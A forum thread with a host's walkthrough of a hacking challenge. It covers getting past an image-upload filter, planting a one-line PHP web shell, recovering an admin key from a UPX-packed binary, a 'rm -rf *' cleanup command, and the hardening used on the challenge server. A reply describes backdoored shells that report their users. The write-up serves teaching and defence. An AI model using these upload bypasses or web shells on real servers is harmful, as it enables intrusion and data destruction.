
Security Challenge II


Comments

  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    That's because of the tags. The browser will think it's an unknown HTML tag.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    h57xiucj2z946q wrote: »
    That's because of the tags. The browser will think it's an unknown HTML tag.

    It shouldn't do if it's in between pre tags though, as it won't be parsed as HTML. It should still list in the view source.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    dlofnep wrote: »
    It shouldn't do if it's in between pre tags though, as it won't be parsed as HTML.

    Oh! Hehe, I dunno then.

    Was the pre tag closed?


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    <pre>
    <b>hi</b>
    <i>hi</i>
    <?php echo 'test'; ?>
    </pre>
    

    Try that and save it as pre.html.

    Open it and you should see the two hi's, and then if you view the source you'll see the php code.


  • Registered Users Posts: 367 ✭✭900913


    http://damo.dyndns.info/images/pre.html

    yep, two hi's

    and in the source is the <?php echo 'test'; ?>

    I'm getting more confused .


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    As far as I was aware, <pre> doesn't ignore tag evaluation. You still need to replace < > with &lt; and &gt;


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    It will list the PHP code in the source, I'm sure of it. Check out my example 900913 has posted.

    It worked for me when I attacked the application in any case. I've done it a number of times before using that shell.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    dlofnep wrote: »
    It will list the PHP code in the source, I'm sure of it. Check out my example 900913 has posted.

    It worked for me when I attacked the application in any case. I've done it a number of times before using that shell.



    I thought yous were trying to display the code in the browser itself.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Well technically it's in the browser, just with view-source ;)


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Haha ok.

    I will be posting some notes on the challenge tomorrow or Sunday.


  • Registered Users Posts: 367 ✭✭900913


    Am I still going into the genius bloopers?


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Lol we'll see.


  • Closed Accounts Posts: 5,082 ✭✭✭Pygmalion


    900913 wrote: »
    damo was there many shells (r57, c99 type) uploaded or did most people opt for the basic <? exec($_REQUEST['cmd']); ?> type.

    I didn't even do that, I just modified the file and re-uploaded after every command :p. I assumed at first
    all I'd have to do was read from the halloffame.php file to see where the list of users was, then system("echo Pygmalion >> list.txt");
    By the time I realised I couldn't do that I just wasn't bothered remembering how stuff like $_REQUEST works, been so long since I've used PHP.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Hall of Fame:
    CheeseCake_Monster
    DonkeyS
    peann
    ack_
    Phlux
    900913
    micols
    Pygmalion
    


    Solution:

    The idea is to get your name on the hall of fame. All you are given is a page to upload and host your images. If you upload an image, you see that you are then given a direct link to the image you just uploaded. There isn't much here that gives us any trace of the hall of fame.

    What if we could upload something more useful than an image? We know the server supports PHP (you just loaded index.php).

    Wouldn't it be a good idea to load some PHP code on the server?

    Look at the source code of index.php. You will notice a JavaScript trying to force you to only upload .jpg, .png, .gif files. There are a few ways to get around this.

    Hard: debug the JavaScript (tip: Firebug)
    Easy: save index.php locally, tweak the JavaScript and then use that
    Easier: disable JavaScript in the browser and upload
    No action needed: users with NoScript in Firefox would have to do nothing here. They may not even have known this check was in place.

    Next you decide what PHP to upload. A shell would be nice. If you Google "php shell" you will get some more info on this if you dunno what it is. The most basic shell: <?php passthru($_GET['cmd']); ?> Save as something.php. You can use this as something.php?cmd=ls -l
    If you want to go further, you can get huge sophisticated shells like r57 or c99; however most of them today have backdoors included, so the people who modified them know exactly when and where you are using them. Also most antivirus products detect these scripts.

    Try uploading your something.php to the server. Unfortunately you get an error:
    something.php does not appear to be an image.
    File is detected as: application/octet-stream
    
    (Note for this article, I'm not prefixing the milliseconds on the file name, that was just to keep file names unique in the challenge)

    So the browser is reporting the file's MIME type as application/octet-stream.
    The MIME type must be in the POST data, so how can we fix this? Get Tamper Data for Firefox. Open it up and click "Start Tamper", upload another image and when Tamper Data asks you what you want to do, click "Tamper". In the post data field on the top right, if you scroll down, you will see: application/octet-stream. You can change this to image/png or image/gif etc., then click Submit/OK.

    And yes, another error..
    something.php is not a VALID image!
    

    If you're lost, you can Google:
    php check if file is image

    Eventually you will come across getimagesize() (http://php.net/manual/en/function.getimagesize.php) and see that it returns FALSE if the file is not an image. How do we fool this function?

    Google: getimagesize hack
    file upload exploit
    image upload exploit etc..

    You will come across two solutions:
    Create a PHP file with an image header, e.g. get a PNG header or JPEG header (again, Google this) and put it at the start of your .php script with a hex editor. This way the getimagesize() function will get a valid value from the header, and the PHP interpreter will output all the other data raw to the browser but still execute everything between <?php and ?>.

    An easier way for less experienced people is to insert PHP code into the comment field of an image. E.g. get a small .PNG image and use GIMP to edit the image comments. Save, rename to .php.

    If you bypass all of these checks in a row (extension check, MIME check, image size check), you will end up with a .php on the server.

    halloffame.php shows the current hall of fame, so let's try to read that, assuming you're using the simple shell above. With r57, c99 etc. you can use the web interface they give you instead.

    damo.dyndns.info/images/something.php?cmd=ls -la
    View page Source in the browser for better formatting or use <pre> tags in your script.

    README? What's that?
    damo.dyndns.info/images/something.php?cmd=cat README
    If you can read this, then you are half way there :-)
    

    Ok so we know the hall of fame list is shown by halloffame.php; where does it get this list?
    damo.dyndns.info/images/something.php?cmd=cat ../halloffame.php

    You can see halloffame.php gets the list of users by executing:
    exec("/home/challenge2/challenge2_admin_tool -l", $data, $ret);

    What's challenge2_admin_tool? something.php?cmd=file /home/challenge2/challenge2_admin_tool
    It's a Linux binary (just a simple little C application for this challenge).

    What does it do?
    damo.dyndns.info/images/something.php?cmd=/home/challenge2/challenge2_admin_tool
    Security Challenge II Administration Tool v1.0
            Use this tool to manage the Security Challenge II Hall of Fame
            
            Usage: challenge2_admin_tool [OPTION]...
            
            List Hall of Fame members:
              -l, --list                lists the current members of the hall of fame
            
            Add a new user to Hall of Fame: (requires admin key)
              -a, --add                 Add a new user to the Hall of Fame
              -k, --adminkey=ADMINKEY   Security Challenge admin key
              -n, --newname=NEWNAME     New username to add to Hall of Fame
            
            Example: challenge2_admin_tool -l
                     challenge2_admin_tool -a -k AdminKey -n NewName
    

    How do we get the admin key? Let's try some things first before we resort to debugging.
    damo.dyndns.info/images/something.php?cmd=strings /home/challenge2/challenge2_admin_tool > /var/www/images/strings.txt
    Then open damo.dyndns.info/images/strings.txt in the browser. Take a look through and see if there is anything interesting. You can see a UPX section in the ELF for a start. Also at the end of the binary you see:
    Info: This file is packed with the UPX executable packer
    http://upx.sf.net $
     $Id: UPX 3.05 Copyright (C) 1996-2010 the UPX Team. All Rights Reserved.
    

    An executable packer. I wonder if we can unpack it easily?
    Google: UPX. You should arrive here easily enough: http://linux.die.net/man/1/upx. You will see:
    Decompress

    All UPX supported file formats can be unpacked using the -d switch, eg. upx -d yourfile.exe will un-compress the file you've just compressed.
    

    damo.dyndns.info/images/something.php?cmd=upx -d /home/challenge2/challenge2_admin_tool won't work.
    For one, you only have write permissions to /var/www/images, and two, because the admin is a pain in the ass and he removed upx from the server :-P (it doesn't normally come on Debian anyway, but you can get it easily with, as root: aptitude install upx)

    Note: if you Googled "UPX unpack", you will come across many articles showing you how to manually unpack UPX with debuggers and memory dumpers; however the UPX tool can unpack the binary automatically anyway!

    Another tip: you can use UPX on Windows to unpack an ELF binary, and use UPX on Linux to unpack a Win32 binary, etc.
    So what you can do is download the challenge2_admin_tool tool (copy it to the images folder and download it with the browser; zip it first if your browser is displaying it raw rather than letting you download it). Get a copy of UPX here: upx.sourceforge.net

    upx -d challenge2_admin_tool. Now you have an unpacked ELF. Let's look through this. This binary is a whopping 500kB, so let's search for known strings. You can filter it down a little if you're using Linux, just run "strings" on this again; Cygwin users on Windows also have "strings", else use a hex editor.

    Search for e.g. "Security Challenge II Administration Tool", which is a string we got from running the executable above. This will take us to the .data section of the ELF. Take a look around for possible pass-phrases. Eventually you will come across: "x5Tby78RTRa43Rdf5rR432"

    This looks like a password? Let's try it:
    damo.dyndns.info/images/something.php?cmd=/home/challenge2/challenge2_admin_tool -a -k x5Tby78RTRa43Rdf5rR432 -n MeMeMe
    Added MeMeMe to the Hall of Fame. Congratulations MeMeMe :-)
    

    This 2nd part of the challenge was supposed to be easier. The exe is normally about 6kB (4kB UPX packed), so searching through it would have been easier; however UPX doesn't like small executables, so I compiled it statically, which bloated it up enough for UPX to accept.

    It just meant you got a load of strings from the statically linked libraries in the exe as well.
    # gcc --static challenge2_admin_tool.c -o challenge2_admin_tool
    # strip challenge2_admin_tool
    # upx -9 challenge2_admin_tool
    

    Also note, the path of the hall of fame file is ciphered in the binary; this is to discourage people from looking for and manually editing the hall of fame file. It is also ciphered anyway :-)

    So that was basically all there was to this challenge. Clean up after yourself: damo.dyndns.info/images/something.php?cmd=\rm -rf *
    This will only delete files owned by www-data in images folder.


    I have uploaded the source code of the web-server files, and the admin tool if anyone wants to host a similar challenge.


    Some notes about the server:

    This was Debian 6 running Apache 2/PHP5 with latest OS & package updates running in a VM hosted on Windows 7.

    If you are thinking of running a similar challenge, I would suggest applying some of this hardening:

    * Debian and the latest apache2 in the repositories by default are pretty good at setting up permissions. E.g. only root can view Apache config files; this is also the case with Apache log files. PHP by default has logging being redirected to the web-server disabled; errors will come out in the Apache logs instead.

    Apache's default config file was updated to disable indexing of /var/www's content. This means users could get a list of all files in the /var/www/images/ folder, and may have gotten hints from other users' work. To prevent this, I edited /etc/apache2/sites-enabled/default:
    DocumentRoot /var/www

    <Directory />
        Options Indexes FollowSymLinks
        AllowOverride None
    </Directory>

    And remove "Indexes" from above and restart Apache.



    Disable outgoing connections for "www-data" using IPtables.
    # iptables --new-chain out_apache
    # iptables --append OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
    # iptables --append OUTPUT -m owner --uid-owner www-data -j out_apache
    # iptables --append out_apache -j REJECT
    


    Also install iptables-persistent:
    # aptitude install iptables-persistent
    # iptables-save > /etc/iptables/rules
    

    Now your rules will survive a reboot.

    Reverse shells are nice and would have been fun for this challenge; however since anyone could have made any outgoing connection, this would have come from my IP, therefore I would have been responsible if any dodgy connections were made.

    Prevent a forkbomb, ulimit the www-data user:
    Edit /etc/security/limits.conf and add:
    www-data        soft    nproc           20
    www-data        hard    nproc           50
    

    Update the OS with the latest OS/kernel/packages to prevent privilege escalation exploits:
    # apt-get update
    # apt-get upgrade
    

    Remove gcc to prevent code being compiled on the server. Note this will only discourage some people, as it's still possible to upload pre-compiled binaries. (Malic uploaded the www.exploit-db.com/exploits/15304/ exploit in a binary with an image header, then used "sed" on the server to remove the header, leaving a working executable. The server however was not vulnerable to this exploit. It is a pretty new exploit though [around October 2010], so check your systems).
    # apt-get remove gcc   or   aptitude remove gcc
    


    If you want to leave the SSH server open so you can monitor the server remotely, restrict which IPs can connect through SSH by using either:
    1. hosts.deny file
    2. SSH Config file
    3. Iptables

    This will also discourage people trying to brute force a login in case they think it's part of the challenge.


    Some bloopers which led to extra hardening of the system:

    At the start Cheesecake Monster did rm * after he got on the Hall of Fame. This also removed the half-way indicator file, "README". This was later prevented by setting the sticky bit on the images/ folder.
    # chmod 1777 /var/www/images
    or
    # chmod +t /var/www/images
    
    root@challenge:~# ls -l /var/www/
    total 64
    -rw-r--r-- 1 challenge2 challenge2   453 Apr  5 20:16 about.php
    -rw-r--r-- 1 challenge2 challenge2 14929 Apr  2 17:02 banner.png
    -rw-r--r-- 1 challenge2 challenge2  1674 Apr  3 20:31 challenge.php
    -rw-r--r-- 1 challenge2 challenge2   115 Apr  3 02:38 footer.htm
    -rw-r--r-- 1 challenge2 challenge2   458 Apr  3 20:49 halloffame.php
    -rw-r--r-- 1 challenge2 challenge2   509 Apr  2 19:01 header.htm
    drwxrwxrwt 2 challenge2 challenge2 20480 Apr  9 01:49 images
    -rw-r--r-- 1 challenge2 challenge2  1654 Apr  2 22:23 index.php
    -rw-r--r-- 1 challenge2 challenge2  1929 Apr  7 21:33 uploadimage.php
    

    This means only www-data can delete files created by www-data. Only the owner can delete their own files. README was owned by challenge2 user.


    900913 found the Hall of Fame file in "/var/tmp/ /". Yes, that's a space, so you need to use the following in a shell to get to it (note: probably not needed for web shells).
    # cd /var/tmp/" "/      or
    # cd /var/tmp/\ /
    

    This file is ciphered, but 900913 put his name in the file anyway in plain text, so the hall of fame on the web server has his name ciphered (reverse ciphered).

    To discourage finding and editing this file manually, the hall of fame file was then renamed, and the directory "/var/tmp/ /" had its +r bit removed but left its +wx bits intact. For a directory, this permission setup will allow a user to read/write a file in the directory when they specify the file name, but the user cannot get a list of all files in this directory. Therefore they cannot manually edit the hall of fame file unless they know its exact name.
    # chmod -r /var/tmp/" "
    
    root@challenge:~# ls -l /var/tmp
    total 4
    d-wx-wx-wx 2 challenge2 challenge2 4096 Apr  9 10:15
    
    # su - www-data
    # ls -la /var/tmp/\ /
    ls: /var/tmp/\ /: Permission denied
    


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Brilliant challenge, I really enjoyed it. Best so far, and certainly the most difficult.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Cheers dlofnep.

    Forgot the source files. Attached now.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    Sound man :)


  • Registered Users Posts: 56 ✭✭PeterHughes


    Cheers for the challenge

    and I also learned a lot about NoScript along the way.


  • Registered Users Posts: 1,311 ✭✭✭Procasinator


    Unfortunately I missed this challenge.

    Regarding finding the hall0ffame file.

    Another possibility to find the file would be using the strace tool (which I think is installed by default):
    strace -e trace=open ./challenge2_admin_tool
    

    Which will show all calls to open.

    Of course, using this method you'd have to figure out how to encrypt/decrypt the strings yourself (as the names are XORed with 0x81).


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Procasinator wrote: »
    Unfortunately I missed this challenge.

    Regarding finding the hall0ffame file.

    Another possibility to find the file would be using the strace tool (which I think is installed by default):
    strace -e trace=open ./challenge2_admin_tool


    Which will show all calls to open.

    Of course, using this method you'd have to figure out how to encrypt/decrypt the strings yourself (as the names are XORed with 0x81).



    Yes Procasinator, this would work, similar to truss on some versions of UNIX.

    As for the crypt, one could get the first char of the first user in the hall of fame and XOR this against the first char of the first user in the hall of fame file, e.g. 'C' (0x64) XOR 'Â' (0xC2) = 0x81. And you could check with the 2nd character to see if it matches, and so on. This was only a basic crypt to try to steer the attacker away from manually editing the file.
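    The known-plaintext check just described, carried through in Python as an added example (not the challenge's admin tool): the first name shown on the web hall of fame is XORed against the start of the raw file to get the key, every further byte of that name has to agree before the key is accepted, and the whole file is then decoded. The sample file is constructed here, assuming every byte (newlines included) was XORed with the same key.

```python
def recover_xor_key(known_plaintext, ciphertext):
    """Derive the single-byte key from the first byte pair, then insist that
    every remaining byte of the known name gives the same key; return None
    when they disagree (so a wrong guess about the scheme is not decoded)."""
    if not known_plaintext or len(ciphertext) < len(known_plaintext):
        return None
    key = known_plaintext[0] ^ ciphertext[0]
    if any(p ^ c != key for p, c in zip(known_plaintext, ciphertext)):
        return None
    return key


def xor_bytes(data, key):
    """XOR is its own inverse, so this both 'ciphers' and 'deciphers'."""
    return bytes(b ^ key for b in data)


def decode_hall_of_fame(cipher_file, first_name_on_web):
    """Return (key, names) for a hall-of-fame file that was XORed byte-wise
    with one key, given the first name as it appears on the web page."""
    key = recover_xor_key(first_name_on_web.encode(), cipher_file)
    if key is None:
        raise ValueError("file is not a single-byte XOR of the known name")
    return key, xor_bytes(cipher_file, key).decode("latin-1").splitlines()


# Constructed sample: the first names from the hall of fame above, stored the
# way the raw file would look after XOR with 0x81 (the key named in the thread).
# Assumption: every byte, newlines included, is XORed with the same key.
NAMES = ["CheeseCake_Monster", "DonkeyS", "peann", "ack_"]
SAMPLE_FILE = xor_bytes("\n".join(NAMES).encode() + b"\n", 0x81)

# A name written into the file in plain text (as 900913 did) gets XORed on the
# way out, so it shows up on the web page as unreadable high bytes.
PLAINTEXT_ENTRY_AS_SHOWN = xor_bytes(b"900913", 0x81)
```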


  • Registered Users Posts: 1,311 ✭✭✭Procasinator


    h57xiucj2z946q wrote: »
    Yes Procasinator, this would work, similar to truss on some versions of UNIX.

    As for the crypt, one could get the first char of the first user in the hall of fame and XOR this against the first char of the first user in the hall of fame file, e.g. 'C' (0x64) XOR 'Â' (0xC2) = 0x81. And you could check with the 2nd character to see if it matches, and so on. This was only a basic crypt to try to steer the attacker away from manually editing the file.

    Yeah, it wouldn't have taken too long to figure out the encryption scheme.

    Another option would have been to use setuid/setgid on the challenge2_admin_tool tool, and only allow a user who isn't www-data, and who owns the program, to access (read and write) the .hall0ffame file. That way any access to the .hall0ffame file would have to go through challenge2_admin_tool (unless a privilege escalation vulnerability existed somewhere).

    All www-data would need is execute privileges on challenge2_admin_tool.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    Procasinator wrote: »
    Yeah, it wouldn't have taken too long to figure out the encryption scheme.

    Another option would have been to use setuid/setgid on the challenge2_admin_tool tool, and only allow a user who isn't www-data, and who owns the program, to access (read and write) the .hall0ffame file. That way any access to the .hall0ffame file would have to go through challenge2_admin_tool (unless a privilege escalation vulnerability existed somewhere).

    All www-data would need is execute privileges on challenge2_admin_tool.

    I was thinking of that, but was afraid it may lead people off on the wrong trail: privilege escalation. Hehe, you'll notice I don't sanitize the buffers too well, or at all, in that small tool, so that could have been possible, although I assume the latest kernels and gcc compilers offer some protection against basic buffer overflows. :-)


  • Registered Users Posts: 367 ✭✭900913


    Brilliant challenge,

    The only part I disagree with is:
    Clean up after yourself: damo.dyndns.info/images/something.php?cmd=\rm -rf *
    This will only delete files owned by www-data in images folder.

    I know it was only a fun challenge but in real life that could wipe every image that's linked to in the html directory .

    The first three directories I always check are /home, /etc and /tmp, and after that /root.

    damo
    Would an ls -al /var/tmp/ have shown that hidden file.

    I just realised that if I was smarter I could have waited to near the end of the challenge and then deleted all the other hall of fame names and added mine right at the end.
    But you caught me out before I even thought of it.


    How long until the next challenge?


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    900913 wrote: »
    Would an ls -al /var/tmp/ have shown that hidden file.

    Well the hidden file was in a folder called " ", so this doesn't look noticeable in shells.
    So you need to do an ls -la /var/tmp/\ / but only root can "list" this directory.

    900913 wrote: »
    I just realised that if I was smarter I could have waited to near the end of the challenge and then deleted all the other hall of fame names and added mine right at the end.
    But you caught me out before I even thought of it.

    Hehe, stuff like that is what would make me take down the challenge :-)

    900913 wrote: »
    How long until the next challenge?

    Not sure, would like to see other people put up challenges also.

    Did you try my first challenge when it was up?


  • Registered Users Posts: 367 ✭✭900913


    I only tried one other challenge from boards.ie. It was by dlofnep.

    I'd never delete anything from a server, that's why I disagreed with the:
    damo.dyndns.info/images/something.php?cmd=\rm -rf *

    If I did that I would delete all the other attempted shells.


    I missed your last challenge, I hope it was easier than this.


  • Registered Users Posts: 367 ✭✭900913


    h57xiucj2z946q wrote: »
    If you want to go further, you can get huge sophisticated shells like r57 or c99; however most of them today have backdoors included, so the people who modified them know exactly when and where you are using them. Also most antivirus products detect these scripts.

    True, even in the plain text shells you can add a base64 encoded backdoor that emails you the location of the shell, I have a few floating around, but every time googlebot touches one of them I get an email(nightmare).

    h57xiucj2z946q wrote: »
    Also most antivirus products detect these scripts

    You know yourself, the AV will only alert if they're in plain text. If you use base64-type encoding you're ok,

    But then again, if you use an encoded shell that you didn't encode yourself,
    chances are it's backdoored .

    Here's an example of the info I get from backdoored shells.
    Fri, 15 Apr 2011 05:32:44 +0200
    IP: 00.000.00.000 | Hostname: crawl-66-249-66-232.googlebot.com
    User Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) | Page: /zzzzzzzzz/zzzzzzz/zzzzzzzz.php?x=aaaaaaaaa&d=%2Fhome%2aaaaaaa37%2Fpublic_html%2F_aaaaaa%2F&pid=000000&zzz=0
    URL: http://zzzzzz.zzz/dir/dir/dir.php?x=ssssss&d=%2Fhome%2Fssssss37%2Fpublic_html%2Fsssssss%2F&ccccc=99999&xxxx=999

    It even gives the ip address of the person who is using the shell.

    *edit

    I've been following some hackers with this shell for a year now...
    Every server they get on to they upload a PHP mailer script and then usually put up a phishing site.

    Backdoored shell=mobile honeypot


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    900913 wrote: »
    How long until the next challenge?

    Not long, started working on some ideas, have nearly everything thought of, just need to start coding now. Unfortunately some may find it a bit more tricky than the last one.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    h57xiucj2z946q wrote: »
    Not long, started working on some ideas, have nearly everything thought of, just need to start coding now. Unfortunately some may find it a bit more tricky than the last one.

    There's nothing unfortunate about that :) Anything that will push our limits will only make us better.


  • Closed Accounts Posts: 2,267 ✭✭✭h57xiucj2z946q


    I'm making progress, will have something up in the next few days.

    Anyone else got any challenges planned?

